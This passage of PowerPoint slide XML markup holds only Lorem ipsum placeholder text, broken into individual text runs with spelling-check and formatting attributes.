              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ac. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pellentesque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor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. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dui, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tempus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>justo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>convallis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>luctus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lorem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sagittis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> quam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>placerat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>velit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sagittis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scelerisque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dignissim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consequat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pellentesque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>justo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>neque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non ante ac </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>elementum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consequat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Interdum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fames ac ante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipsum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>primis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>faucibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aliquet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>imperdiet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Suspendisse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultrices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tempor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> magna. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
